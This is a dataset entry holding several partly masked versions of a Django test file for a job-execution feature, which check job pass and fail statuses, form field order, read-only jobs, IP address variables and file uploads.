"step-1": "<mask token>\n\n\nclass JobTest(TestCase):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def test_field_order(self):\n \"\"\"\n Job test with field order.\n \"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR,\n 'extras/tests/dummy_jobs')):\n module = 'test_field_order'\n name = 'TestFieldOrder'\n job_class = get_job(f'local/{module}/{name}')\n form = job_class().as_form()\n self.assertHTMLEqual(form.as_table(),\n \"\"\"<tr><th><label for=\"id_var2\">Var2:</label></th><td>\n<input class=\"form-control form-control\" id=\"id_var2\" name=\"var2\" placeholder=\"None\" required type=\"text\">\n<br><span class=\"helptext\">Hello</span></td></tr>\n<tr><th><label for=\"id_var23\">Var23:</label></th><td>\n<input class=\"form-control form-control\" id=\"id_var23\" name=\"var23\" placeholder=\"None\" required type=\"text\">\n<br><span class=\"helptext\">I want to be second</span></td></tr>\n<tr><th><label for=\"id__commit\">Commit changes:</label></th><td>\n<input checked id=\"id__commit\" name=\"_commit\" placeholder=\"Commit changes\" type=\"checkbox\">\n<br><span class=\"helptext\">Commit changes to the database (uncheck for a dry-run)</span></td></tr>\"\"\"\n )\n <mask token>\n\n def test_ready_only_job_pass(self):\n \"\"\"\n Job read only test with pass result.\n \"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR,\n 'extras/tests/dummy_jobs')):\n module = 'test_read_only_pass'\n name = 'TestReadOnlyPass'\n job_class = get_job(f'local/{module}/{name}')\n job_result = JobResult.objects.create(name=job_class.class_path,\n obj_type=self.job_content_type, user=None, job_id=uuid.uuid4())\n run_job(data={}, request=None, commit=False, job_result_pk=\n job_result.pk)\n job_result.refresh_from_db()\n self.assertEqual(job_result.status, JobResultStatusChoices.\n STATUS_COMPLETED)\n self.assertEqual(Site.objects.count(), 0)\n <mask token>\n\n def test_read_only_no_commit_field(self):\n \"\"\"\n Job read only test commit field is not shown.\n \"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR,\n 'extras/tests/dummy_jobs')):\n module = 'test_read_only_no_commit_field'\n name = 'TestReadOnlyNoCommitField'\n job_class = get_job(f'local/{module}/{name}')\n form = job_class().as_form()\n self.assertHTMLEqual(form.as_table(),\n \"\"\"<tr><th><label for=\"id_var\">Var:</label></th><td>\n<input class=\"form-control form-control\" id=\"id_var\" name=\"var\" placeholder=\"None\" required type=\"text\">\n<br><span class=\"helptext\">Hello</span><input id=\"id__commit\" name=\"_commit\" type=\"hidden\" value=\"False\"></td></tr>\"\"\"\n )\n <mask token>\n\n\nclass JobFileUploadTest(TestCase):\n \"\"\"Test a job that uploads/deletes files.\"\"\"\n\n @classmethod\n def setUpTestData(cls):\n cls.file_contents = b'I am content.\\n'\n cls.dummy_file = SimpleUploadedFile(name='dummy.txt', content=cls.\n file_contents)\n cls.job_content_type = ContentType.objects.get(app_label='extras',\n model='job')\n\n def setUp(self):\n self.dummy_file.seek(0)\n\n def test_run_job_pass(self):\n \"\"\"Test that file upload succeeds; job SUCCEEDS; and files are deleted.\"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR,\n 'extras/tests/dummy_jobs')):\n job_name = 'local/test_file_upload_pass/TestFileUploadPass'\n job_class = get_job(job_name)\n job_result = JobResult.objects.create(name=job_class.class_path,\n obj_type=self.job_content_type, user=None, job_id=uuid.uuid4())\n data = {'file': self.dummy_file}\n form = job_class().as_form(files=data)\n self.assertTrue(form.is_valid())\n serialized_data = job_class.serialize_data(form.cleaned_data)\n self.assertTrue(isinstance(serialized_data['file'], uuid.UUID))\n self.assertEqual(serialized_data['file'], FileProxy.objects.\n latest().pk)\n self.assertEqual(FileProxy.objects.count(), 1)\n run_job(data=serialized_data, request=None, commit=False,\n job_result_pk=job_result.pk)\n job_result.refresh_from_db()\n self.assertEqual(job_result.data['run']['log'][0][2],\n f'File contents: {self.file_contents}')\n self.assertEqual(FileProxy.objects.count(), 0)\n\n def test_run_job_fail(self):\n \"\"\"Test that file upload succeeds; job FAILS; files deleted.\"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR,\n 'extras/tests/dummy_jobs')):\n job_name = 'local/test_file_upload_fail/TestFileUploadFail'\n job_class = get_job(job_name)\n job_result = JobResult.objects.create(name=job_class.class_path,\n obj_type=self.job_content_type, user=None, job_id=uuid.uuid4())\n data = {'file': self.dummy_file}\n form = job_class().as_form(files=data)\n self.assertTrue(form.is_valid())\n serialized_data = job_class.serialize_data(form.cleaned_data)\n self.assertTrue(isinstance(serialized_data['file'], uuid.UUID))\n self.assertEqual(serialized_data['file'], FileProxy.objects.\n latest().pk)\n self.assertEqual(FileProxy.objects.count(), 1)\n run_job(data=serialized_data, request=None, commit=False,\n job_result_pk=job_result.pk)\n job_result.refresh_from_db()\n self.assertEqual(job_result.data['run']['log'][0][2],\n f'File contents: {self.file_contents}')\n self.assertEqual(job_result.data['run']['log'][-1][-1],\n 'Database changes have been reverted due to error.')\n self.assertEqual(FileProxy.objects.count(), 0)\n",
"step-2": "<mask token>\n\n\nclass JobTest(TestCase):\n <mask token>\n <mask token>\n\n @classmethod\n def setUpTestData(cls):\n cls.job_content_type = ContentType.objects.get(app_label='extras',\n model='job')\n\n def test_job_pass(self):\n \"\"\"\n Job test with pass result.\n \"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR,\n 'extras/tests/dummy_jobs')):\n module = 'test_pass'\n name = 'TestPass'\n job_class = get_job(f'local/{module}/{name}')\n job_result = JobResult.objects.create(name=job_class.class_path,\n obj_type=self.job_content_type, user=None, job_id=uuid.uuid4())\n run_job(data={}, request=None, commit=False, job_result_pk=\n job_result.pk)\n job_result.refresh_from_db()\n self.assertEqual(job_result.status, JobResultStatusChoices.\n STATUS_COMPLETED)\n <mask token>\n\n def test_field_order(self):\n \"\"\"\n Job test with field order.\n \"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR,\n 'extras/tests/dummy_jobs')):\n module = 'test_field_order'\n name = 'TestFieldOrder'\n job_class = get_job(f'local/{module}/{name}')\n form = job_class().as_form()\n self.assertHTMLEqual(form.as_table(),\n \"\"\"<tr><th><label for=\"id_var2\">Var2:</label></th><td>\n<input class=\"form-control form-control\" id=\"id_var2\" name=\"var2\" placeholder=\"None\" required type=\"text\">\n<br><span class=\"helptext\">Hello</span></td></tr>\n<tr><th><label for=\"id_var23\">Var23:</label></th><td>\n<input class=\"form-control form-control\" id=\"id_var23\" name=\"var23\" placeholder=\"None\" required type=\"text\">\n<br><span class=\"helptext\">I want to be second</span></td></tr>\n<tr><th><label for=\"id__commit\">Commit changes:</label></th><td>\n<input checked id=\"id__commit\" name=\"_commit\" placeholder=\"Commit changes\" type=\"checkbox\">\n<br><span class=\"helptext\">Commit changes to the database (uncheck for a dry-run)</span></td></tr>\"\"\"\n )\n\n def test_no_field_order(self):\n \"\"\"\n Job test without field_order.\n \"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR,\n 'extras/tests/dummy_jobs')):\n module = 'test_no_field_order'\n name = 'TestNoFieldOrder'\n job_class = get_job(f'local/{module}/{name}')\n form = job_class().as_form()\n self.assertHTMLEqual(form.as_table(),\n \"\"\"<tr><th><label for=\"id_var23\">Var23:</label></th><td>\n<input class=\"form-control form-control\" id=\"id_var23\" name=\"var23\" placeholder=\"None\" required type=\"text\">\n<br><span class=\"helptext\">I want to be second</span></td></tr>\n<tr><th><label for=\"id_var2\">Var2:</label></th><td>\n<input class=\"form-control form-control\" id=\"id_var2\" name=\"var2\" placeholder=\"None\" required type=\"text\">\n<br><span class=\"helptext\">Hello</span></td></tr>\n<tr><th><label for=\"id__commit\">Commit changes:</label></th><td>\n<input checked id=\"id__commit\" name=\"_commit\" placeholder=\"Commit changes\" type=\"checkbox\">\n<br><span class=\"helptext\">Commit changes to the database (uncheck for a dry-run)</span></td></tr>\"\"\"\n )\n\n def test_ready_only_job_pass(self):\n \"\"\"\n Job read only test with pass result.\n \"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR,\n 'extras/tests/dummy_jobs')):\n module = 'test_read_only_pass'\n name = 'TestReadOnlyPass'\n job_class = get_job(f'local/{module}/{name}')\n job_result = JobResult.objects.create(name=job_class.class_path,\n obj_type=self.job_content_type, user=None, job_id=uuid.uuid4())\n run_job(data={}, request=None, commit=False, job_result_pk=\n job_result.pk)\n job_result.refresh_from_db()\n self.assertEqual(job_result.status, JobResultStatusChoices.\n STATUS_COMPLETED)\n self.assertEqual(Site.objects.count(), 0)\n\n def test_read_only_job_fail(self):\n \"\"\"\n Job read only test with fail result.\n \"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR,\n 'extras/tests/dummy_jobs')):\n module = 'test_read_only_fail'\n name = 'TestReadOnlyFail'\n job_class = get_job(f'local/{module}/{name}')\n job_result = JobResult.objects.create(name=job_class.class_path,\n obj_type=self.job_content_type, user=None, job_id=uuid.uuid4())\n run_job(data={}, request=None, commit=False, job_result_pk=\n job_result.pk)\n job_result.refresh_from_db()\n self.assertEqual(job_result.status, JobResultStatusChoices.\n STATUS_ERRORED)\n self.assertEqual(Site.objects.count(), 0)\n self.assertNotEqual(job_result.data['run']['log'][-1][-1],\n 'Database changes have been reverted due to error.')\n\n def test_read_only_no_commit_field(self):\n \"\"\"\n Job read only test commit field is not shown.\n \"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR,\n 'extras/tests/dummy_jobs')):\n module = 'test_read_only_no_commit_field'\n name = 'TestReadOnlyNoCommitField'\n job_class = get_job(f'local/{module}/{name}')\n form = job_class().as_form()\n self.assertHTMLEqual(form.as_table(),\n \"\"\"<tr><th><label for=\"id_var\">Var:</label></th><td>\n<input class=\"form-control form-control\" id=\"id_var\" name=\"var\" placeholder=\"None\" required type=\"text\">\n<br><span class=\"helptext\">Hello</span><input id=\"id__commit\" name=\"_commit\" type=\"hidden\" value=\"False\"></td></tr>\"\"\"\n )\n\n def test_ip_address_vars(self):\n \"\"\"\n Test that IPAddress variable fields behave as expected.\n\n This test case exercises the following types for both IPv4 and IPv6:\n\n - IPAddressVar\n - IPAddressWithMaskVar\n - IPNetworkVar\n \"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR,\n 'extras/tests/dummy_jobs')):\n module = 'test_ipaddress_vars'\n name = 'TestIPAddresses'\n job_class = get_job(f'local/{module}/{name}')\n form_data = dict(ipv4_address='1.2.3.4', ipv4_with_mask=\n '1.2.3.4/32', ipv4_network='1.2.3.0/24', ipv6_address=\n '2001:db8::1', ipv6_with_mask='2001:db8::1/64',\n ipv6_network='2001:db8::/64')\n form = job_class().as_form(form_data)\n self.assertTrue(form.is_valid())\n job_result = JobResult.objects.create(name=job_class.class_path,\n obj_type=self.job_content_type, user=None, job_id=uuid.uuid4())\n data = job_class.serialize_data(form.cleaned_data)\n run_job(data=data, request=None, commit=False, job_result_pk=\n job_result.pk)\n job_result.refresh_from_db()\n job_payload = job_result.data['run']['log'][0][2]\n job_result_data = json.loads(job_payload)\n self.assertEqual(job_result.status, JobResultStatusChoices.\n STATUS_COMPLETED)\n self.assertEqual(form_data, job_result_data)\n\n\nclass JobFileUploadTest(TestCase):\n \"\"\"Test a job that uploads/deletes files.\"\"\"\n\n @classmethod\n def setUpTestData(cls):\n cls.file_contents = b'I am content.\\n'\n cls.dummy_file = SimpleUploadedFile(name='dummy.txt', content=cls.\n file_contents)\n cls.job_content_type = ContentType.objects.get(app_label='extras',\n model='job')\n\n def setUp(self):\n self.dummy_file.seek(0)\n\n def test_run_job_pass(self):\n \"\"\"Test that file upload succeeds; job SUCCEEDS; and files are deleted.\"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR,\n 'extras/tests/dummy_jobs')):\n job_name = 'local/test_file_upload_pass/TestFileUploadPass'\n job_class = get_job(job_name)\n job_result = JobResult.objects.create(name=job_class.class_path,\n obj_type=self.job_content_type, user=None, job_id=uuid.uuid4())\n data = {'file': self.dummy_file}\n form = job_class().as_form(files=data)\n self.assertTrue(form.is_valid())\n serialized_data = job_class.serialize_data(form.cleaned_data)\n self.assertTrue(isinstance(serialized_data['file'], uuid.UUID))\n self.assertEqual(serialized_data['file'], FileProxy.objects.\n latest().pk)\n self.assertEqual(FileProxy.objects.count(), 1)\n run_job(data=serialized_data, request=None, commit=False,\n job_result_pk=job_result.pk)\n job_result.refresh_from_db()\n self.assertEqual(job_result.data['run']['log'][0][2],\n f'File contents: {self.file_contents}')\n self.assertEqual(FileProxy.objects.count(), 0)\n\n def test_run_job_fail(self):\n \"\"\"Test that file upload succeeds; job FAILS; files deleted.\"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR,\n 'extras/tests/dummy_jobs')):\n job_name = 'local/test_file_upload_fail/TestFileUploadFail'\n job_class = get_job(job_name)\n job_result = JobResult.objects.create(name=job_class.class_path,\n obj_type=self.job_content_type, user=None, job_id=uuid.uuid4())\n data = {'file': self.dummy_file}\n form = job_class().as_form(files=data)\n self.assertTrue(form.is_valid())\n serialized_data = job_class.serialize_data(form.cleaned_data)\n self.assertTrue(isinstance(serialized_data['file'], uuid.UUID))\n self.assertEqual(serialized_data['file'], FileProxy.objects.\n latest().pk)\n self.assertEqual(FileProxy.objects.count(), 1)\n run_job(data=serialized_data, request=None, commit=False,\n job_result_pk=job_result.pk)\n job_result.refresh_from_db()\n self.assertEqual(job_result.data['run']['log'][0][2],\n f'File contents: {self.file_contents}')\n self.assertEqual(job_result.data['run']['log'][-1][-1],\n 'Database changes have been reverted due to error.')\n self.assertEqual(FileProxy.objects.count(), 0)\n",
"step-3": "<mask token>\n\n\nclass JobTest(TestCase):\n <mask token>\n <mask token>\n\n @classmethod\n def setUpTestData(cls):\n cls.job_content_type = ContentType.objects.get(app_label='extras',\n model='job')\n\n def test_job_pass(self):\n \"\"\"\n Job test with pass result.\n \"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR,\n 'extras/tests/dummy_jobs')):\n module = 'test_pass'\n name = 'TestPass'\n job_class = get_job(f'local/{module}/{name}')\n job_result = JobResult.objects.create(name=job_class.class_path,\n obj_type=self.job_content_type, user=None, job_id=uuid.uuid4())\n run_job(data={}, request=None, commit=False, job_result_pk=\n job_result.pk)\n job_result.refresh_from_db()\n self.assertEqual(job_result.status, JobResultStatusChoices.\n STATUS_COMPLETED)\n\n def test_job_fail(self):\n \"\"\"\n Job test with fail result.\n \"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR,\n 'extras/tests/dummy_jobs')):\n module = 'test_fail'\n name = 'TestFail'\n job_class = get_job(f'local/{module}/{name}')\n job_result = JobResult.objects.create(name=job_class.class_path,\n obj_type=self.job_content_type, user=None, job_id=uuid.uuid4())\n run_job(data={}, request=None, commit=False, job_result_pk=\n job_result.pk)\n job_result.refresh_from_db()\n self.assertEqual(job_result.status, JobResultStatusChoices.\n STATUS_ERRORED)\n\n def test_field_order(self):\n \"\"\"\n Job test with field order.\n \"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR,\n 'extras/tests/dummy_jobs')):\n module = 'test_field_order'\n name = 'TestFieldOrder'\n job_class = get_job(f'local/{module}/{name}')\n form = job_class().as_form()\n self.assertHTMLEqual(form.as_table(),\n \"\"\"<tr><th><label for=\"id_var2\">Var2:</label></th><td>\n<input class=\"form-control form-control\" id=\"id_var2\" name=\"var2\" placeholder=\"None\" required type=\"text\">\n<br><span class=\"helptext\">Hello</span></td></tr>\n<tr><th><label for=\"id_var23\">Var23:</label></th><td>\n<input class=\"form-control form-control\" id=\"id_var23\" name=\"var23\" placeholder=\"None\" required type=\"text\">\n<br><span class=\"helptext\">I want to be second</span></td></tr>\n<tr><th><label for=\"id__commit\">Commit changes:</label></th><td>\n<input checked id=\"id__commit\" name=\"_commit\" placeholder=\"Commit changes\" type=\"checkbox\">\n<br><span class=\"helptext\">Commit changes to the database (uncheck for a dry-run)</span></td></tr>\"\"\"\n )\n\n def test_no_field_order(self):\n \"\"\"\n Job test without field_order.\n \"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR,\n 'extras/tests/dummy_jobs')):\n module = 'test_no_field_order'\n name = 'TestNoFieldOrder'\n job_class = get_job(f'local/{module}/{name}')\n form = job_class().as_form()\n self.assertHTMLEqual(form.as_table(),\n \"\"\"<tr><th><label for=\"id_var23\">Var23:</label></th><td>\n<input class=\"form-control form-control\" id=\"id_var23\" name=\"var23\" placeholder=\"None\" required type=\"text\">\n<br><span class=\"helptext\">I want to be second</span></td></tr>\n<tr><th><label for=\"id_var2\">Var2:</label></th><td>\n<input class=\"form-control form-control\" id=\"id_var2\" name=\"var2\" placeholder=\"None\" required type=\"text\">\n<br><span class=\"helptext\">Hello</span></td></tr>\n<tr><th><label for=\"id__commit\">Commit changes:</label></th><td>\n<input checked id=\"id__commit\" name=\"_commit\" placeholder=\"Commit changes\" type=\"checkbox\">\n<br><span class=\"helptext\">Commit changes to the database (uncheck for a dry-run)</span></td></tr>\"\"\"\n )\n\n def test_ready_only_job_pass(self):\n \"\"\"\n Job read only test with pass result.\n \"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR,\n 'extras/tests/dummy_jobs')):\n module = 'test_read_only_pass'\n name = 'TestReadOnlyPass'\n job_class = get_job(f'local/{module}/{name}')\n job_result = JobResult.objects.create(name=job_class.class_path,\n obj_type=self.job_content_type, user=None, job_id=uuid.uuid4())\n run_job(data={}, request=None, commit=False, job_result_pk=\n job_result.pk)\n job_result.refresh_from_db()\n self.assertEqual(job_result.status, JobResultStatusChoices.\n STATUS_COMPLETED)\n self.assertEqual(Site.objects.count(), 0)\n\n def test_read_only_job_fail(self):\n \"\"\"\n Job read only test with fail result.\n \"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR,\n 'extras/tests/dummy_jobs')):\n module = 'test_read_only_fail'\n name = 'TestReadOnlyFail'\n job_class = get_job(f'local/{module}/{name}')\n job_result = JobResult.objects.create(name=job_class.class_path,\n obj_type=self.job_content_type, user=None, job_id=uuid.uuid4())\n run_job(data={}, request=None, commit=False, job_result_pk=\n job_result.pk)\n job_result.refresh_from_db()\n self.assertEqual(job_result.status, JobResultStatusChoices.\n STATUS_ERRORED)\n self.assertEqual(Site.objects.count(), 0)\n self.assertNotEqual(job_result.data['run']['log'][-1][-1],\n 'Database changes have been reverted due to error.')\n\n def test_read_only_no_commit_field(self):\n \"\"\"\n Job read only test commit field is not shown.\n \"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR,\n 'extras/tests/dummy_jobs')):\n module = 'test_read_only_no_commit_field'\n name = 'TestReadOnlyNoCommitField'\n job_class = get_job(f'local/{module}/{name}')\n form = job_class().as_form()\n self.assertHTMLEqual(form.as_table(),\n \"\"\"<tr><th><label for=\"id_var\">Var:</label></th><td>\n<input class=\"form-control form-control\" id=\"id_var\" name=\"var\" placeholder=\"None\" required type=\"text\">\n<br><span class=\"helptext\">Hello</span><input id=\"id__commit\" name=\"_commit\" type=\"hidden\" value=\"False\"></td></tr>\"\"\"\n )\n\n def test_ip_address_vars(self):\n \"\"\"\n Test that IPAddress variable fields behave as expected.\n\n This test case exercises the following types for both IPv4 and IPv6:\n\n - IPAddressVar\n - IPAddressWithMaskVar\n - IPNetworkVar\n \"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR,\n 'extras/tests/dummy_jobs')):\n module = 'test_ipaddress_vars'\n name = 'TestIPAddresses'\n job_class = get_job(f'local/{module}/{name}')\n form_data = dict(ipv4_address='1.2.3.4', ipv4_with_mask=\n '1.2.3.4/32', ipv4_network='1.2.3.0/24', ipv6_address=\n '2001:db8::1', ipv6_with_mask='2001:db8::1/64',\n ipv6_network='2001:db8::/64')\n form = job_class().as_form(form_data)\n self.assertTrue(form.is_valid())\n job_result = JobResult.objects.create(name=job_class.class_path,\n obj_type=self.job_content_type, user=None, job_id=uuid.uuid4())\n data = job_class.serialize_data(form.cleaned_data)\n run_job(data=data, request=None, commit=False, job_result_pk=\n job_result.pk)\n job_result.refresh_from_db()\n job_payload = job_result.data['run']['log'][0][2]\n job_result_data = json.loads(job_payload)\n self.assertEqual(job_result.status, JobResultStatusChoices.\n STATUS_COMPLETED)\n self.assertEqual(form_data, job_result_data)\n\n\nclass JobFileUploadTest(TestCase):\n \"\"\"Test a job that uploads/deletes files.\"\"\"\n\n @classmethod\n def setUpTestData(cls):\n cls.file_contents = b'I am content.\\n'\n cls.dummy_file = SimpleUploadedFile(name='dummy.txt', content=cls.\n file_contents)\n cls.job_content_type = ContentType.objects.get(app_label='extras',\n model='job')\n\n def setUp(self):\n self.dummy_file.seek(0)\n\n def test_run_job_pass(self):\n \"\"\"Test that file upload succeeds; job SUCCEEDS; and files are deleted.\"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR,\n 'extras/tests/dummy_jobs')):\n job_name = 'local/test_file_upload_pass/TestFileUploadPass'\n job_class = get_job(job_name)\n job_result = JobResult.objects.create(name=job_class.class_path,\n obj_type=self.job_content_type, user=None, job_id=uuid.uuid4())\n data = {'file': self.dummy_file}\n form = job_class().as_form(files=data)\n self.assertTrue(form.is_valid())\n serialized_data = job_class.serialize_data(form.cleaned_data)\n self.assertTrue(isinstance(serialized_data['file'], uuid.UUID))\n self.assertEqual(serialized_data['file'], FileProxy.objects.\n latest().pk)\n self.assertEqual(FileProxy.objects.count(), 1)\n run_job(data=serialized_data, request=None, commit=False,\n job_result_pk=job_result.pk)\n job_result.refresh_from_db()\n self.assertEqual(job_result.data['run']['log'][0][2],\n f'File contents: {self.file_contents}')\n self.assertEqual(FileProxy.objects.count(), 0)\n\n def test_run_job_fail(self):\n \"\"\"Test that file upload succeeds; job FAILS; files deleted.\"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR,\n 'extras/tests/dummy_jobs')):\n job_name = 'local/test_file_upload_fail/TestFileUploadFail'\n job_class = get_job(job_name)\n job_result = JobResult.objects.create(name=job_class.class_path,\n obj_type=self.job_content_type, user=None, job_id=uuid.uuid4())\n data = {'file': self.dummy_file}\n form = job_class().as_form(files=data)\n self.assertTrue(form.is_valid())\n serialized_data = job_class.serialize_data(form.cleaned_data)\n self.assertTrue(isinstance(serialized_data['file'], uuid.UUID))\n self.assertEqual(serialized_data['file'], FileProxy.objects.\n latest().pk)\n self.assertEqual(FileProxy.objects.count(), 1)\n run_job(data=serialized_data, request=None, commit=False,\n job_result_pk=job_result.pk)\n job_result.refresh_from_db()\n self.assertEqual(job_result.data['run']['log'][0][2],\n f'File contents: {self.file_contents}')\n self.assertEqual(job_result.data['run']['log'][-1][-1],\n 'Database changes have been reverted due to error.')\n self.assertEqual(FileProxy.objects.count(), 0)\n",
"step-4": "<mask token>\n\n\nclass JobTest(TestCase):\n <mask token>\n maxDiff = None\n\n @classmethod\n def setUpTestData(cls):\n cls.job_content_type = ContentType.objects.get(app_label='extras',\n model='job')\n\n def test_job_pass(self):\n \"\"\"\n Job test with pass result.\n \"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR,\n 'extras/tests/dummy_jobs')):\n module = 'test_pass'\n name = 'TestPass'\n job_class = get_job(f'local/{module}/{name}')\n job_result = JobResult.objects.create(name=job_class.class_path,\n obj_type=self.job_content_type, user=None, job_id=uuid.uuid4())\n run_job(data={}, request=None, commit=False, job_result_pk=\n job_result.pk)\n job_result.refresh_from_db()\n self.assertEqual(job_result.status, JobResultStatusChoices.\n STATUS_COMPLETED)\n\n def test_job_fail(self):\n \"\"\"\n Job test with fail result.\n \"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR,\n 'extras/tests/dummy_jobs')):\n module = 'test_fail'\n name = 'TestFail'\n job_class = get_job(f'local/{module}/{name}')\n job_result = JobResult.objects.create(name=job_class.class_path,\n obj_type=self.job_content_type, user=None, job_id=uuid.uuid4())\n run_job(data={}, request=None, commit=False, job_result_pk=\n job_result.pk)\n job_result.refresh_from_db()\n self.assertEqual(job_result.status, JobResultStatusChoices.\n STATUS_ERRORED)\n\n def test_field_order(self):\n \"\"\"\n Job test with field order.\n \"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR,\n 'extras/tests/dummy_jobs')):\n module = 'test_field_order'\n name = 'TestFieldOrder'\n job_class = get_job(f'local/{module}/{name}')\n form = job_class().as_form()\n self.assertHTMLEqual(form.as_table(),\n \"\"\"<tr><th><label for=\"id_var2\">Var2:</label></th><td>\n<input class=\"form-control form-control\" id=\"id_var2\" name=\"var2\" placeholder=\"None\" required type=\"text\">\n<br><span class=\"helptext\">Hello</span></td></tr>\n<tr><th><label for=\"id_var23\">Var23:</label></th><td>\n<input class=\"form-control form-control\" id=\"id_var23\" name=\"var23\" placeholder=\"None\" required type=\"text\">\n<br><span class=\"helptext\">I want to be second</span></td></tr>\n<tr><th><label for=\"id__commit\">Commit changes:</label></th><td>\n<input checked id=\"id__commit\" name=\"_commit\" placeholder=\"Commit changes\" type=\"checkbox\">\n<br><span class=\"helptext\">Commit changes to the database (uncheck for a dry-run)</span></td></tr>\"\"\"\n )\n\n def test_no_field_order(self):\n \"\"\"\n Job test without field_order.\n \"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR,\n 'extras/tests/dummy_jobs')):\n module = 'test_no_field_order'\n name = 'TestNoFieldOrder'\n job_class = get_job(f'local/{module}/{name}')\n form = job_class().as_form()\n self.assertHTMLEqual(form.as_table(),\n \"\"\"<tr><th><label for=\"id_var23\">Var23:</label></th><td>\n<input class=\"form-control form-control\" id=\"id_var23\" name=\"var23\" placeholder=\"None\" required type=\"text\">\n<br><span class=\"helptext\">I want to be second</span></td></tr>\n<tr><th><label for=\"id_var2\">Var2:</label></th><td>\n<input class=\"form-control form-control\" id=\"id_var2\" name=\"var2\" placeholder=\"None\" required type=\"text\">\n<br><span class=\"helptext\">Hello</span></td></tr>\n<tr><th><label for=\"id__commit\">Commit changes:</label></th><td>\n<input checked id=\"id__commit\" name=\"_commit\" placeholder=\"Commit changes\" type=\"checkbox\">\n<br><span class=\"helptext\">Commit changes to the database (uncheck for a dry-run)</span></td></tr>\"\"\"\n )\n\n def test_ready_only_job_pass(self):\n \"\"\"\n Job read only test with pass result.\n \"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR,\n 'extras/tests/dummy_jobs')):\n module = 'test_read_only_pass'\n name = 'TestReadOnlyPass'\n job_class = get_job(f'local/{module}/{name}')\n job_result = JobResult.objects.create(name=job_class.class_path,\n obj_type=self.job_content_type, user=None, job_id=uuid.uuid4())\n run_job(data={}, request=None, commit=False, job_result_pk=\n job_result.pk)\n job_result.refresh_from_db()\n self.assertEqual(job_result.status, JobResultStatusChoices.\n STATUS_COMPLETED)\n self.assertEqual(Site.objects.count(), 0)\n\n def test_read_only_job_fail(self):\n \"\"\"\n Job read only test with fail result.\n \"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR,\n 'extras/tests/dummy_jobs')):\n module = 'test_read_only_fail'\n name = 'TestReadOnlyFail'\n job_class = get_job(f'local/{module}/{name}')\n job_result = JobResult.objects.create(name=job_class.class_path,\n obj_type=self.job_content_type, user=None, job_id=uuid.uuid4())\n run_job(data={}, request=None, commit=False, job_result_pk=\n job_result.pk)\n job_result.refresh_from_db()\n self.assertEqual(job_result.status, JobResultStatusChoices.\n STATUS_ERRORED)\n self.assertEqual(Site.objects.count(), 0)\n self.assertNotEqual(job_result.data['run']['log'][-1][-1],\n 'Database changes have been reverted due to error.')\n\n def test_read_only_no_commit_field(self):\n \"\"\"\n Job read only test commit field is not shown.\n \"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR,\n 'extras/tests/dummy_jobs')):\n module = 'test_read_only_no_commit_field'\n name = 'TestReadOnlyNoCommitField'\n job_class = get_job(f'local/{module}/{name}')\n form = job_class().as_form()\n self.assertHTMLEqual(form.as_table(),\n \"\"\"<tr><th><label for=\"id_var\">Var:</label></th><td>\n<input class=\"form-control form-control\" id=\"id_var\" name=\"var\" placeholder=\"None\" required type=\"text\">\n<br><span class=\"helptext\">Hello</span><input id=\"id__commit\" name=\"_commit\" type=\"hidden\" value=\"False\"></td></tr>\"\"\"\n )\n\n def test_ip_address_vars(self):\n \"\"\"\n Test that IPAddress variable fields behave as expected.\n\n This test case exercises the following types for both IPv4 and IPv6:\n\n - IPAddressVar\n - IPAddressWithMaskVar\n - IPNetworkVar\n \"\"\"\n with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR,\n 'extras/tests/dummy_jobs')):\n module = 'test_ipaddress_vars'\n name = 'TestIPAddresses'\n job_class = get_job(f'local/{module}/{name}')\n form_data = dict(ipv4_address='1.2.3.4', ipv4_with_mask=\n '1.2.3.4/32', ipv4_network='1.2.3.0/24', ipv6_address=\n '2001:db8::1', ipv6_with_mask='2001:db8::1/64',\n ipv6_network='2001:db8::/64')\n form = job_class().as_form(form_data)\n self.assertTrue(form.is_valid())\n job_result = JobResult.objects.create(name=job_class.class_path,\n obj_type=self.job_content_type, user=None, job_id=uuid.uuid4())\n data = job_class.serialize_data(form.cleaned_data)\n run_job(data=data, request=None, commit=False, job_result_pk=\n job_result.pk)\n job_result.refresh_from_db()\n job_payload = job_result.data['run']['log'][0][2]\n job_result_data = json.loads(job_payload)\n self.assertEqual(job_result.status, JobResultStatusChoices.\n STATUS_COMPLETED)\n self.assertEqual(form_data, job_result_data)\n\n\nclass JobFileUploadTest(TestCase):\n 